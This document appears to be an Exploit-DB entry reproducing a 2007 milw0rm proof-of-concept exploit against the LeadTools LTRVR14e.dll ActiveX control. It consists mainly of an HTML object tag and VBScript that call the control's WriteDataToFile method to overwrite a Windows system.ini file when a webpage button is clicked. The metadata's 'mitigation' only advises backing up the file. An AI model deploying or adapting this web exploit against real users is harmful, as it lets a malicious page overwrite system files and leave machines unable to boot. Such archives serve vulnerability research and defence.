LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite

vendor:

LeadTools Raster Variant Object Library

by:

shinnai

N/A

CVSS

HIGH

Arbitrary File Overwrite

CWE

Product Name: LeadTools Raster Variant Object Library

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2

2007

LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite

The exploit overwrites the system.ini file, potentially causing the PC to not restart. The exploit is triggered by clicking a button on a webpage and is applicable to all software that uses the LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44).

Mitigation:

Make a copy of the system.ini file before running this exploit.

Source

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/21</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------
 <b>LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite</b>
 url: http://www.leadtools.com/
 price: eheheh, take a look at thier site :)

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.
-----------------------------------------------------------------------------------------------------

<object classid='clsid:00140B9B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
   Dim MyMsg
   If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
             "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
             "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
             " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
             " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
    test.WriteDataToFile "c:\windows\system_.ini"
    MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/21 - LeadTools Raster Variant Object Library")
   Else
    MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/21 - LeadTools Raster Variant Object Library")
   End If 
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-21]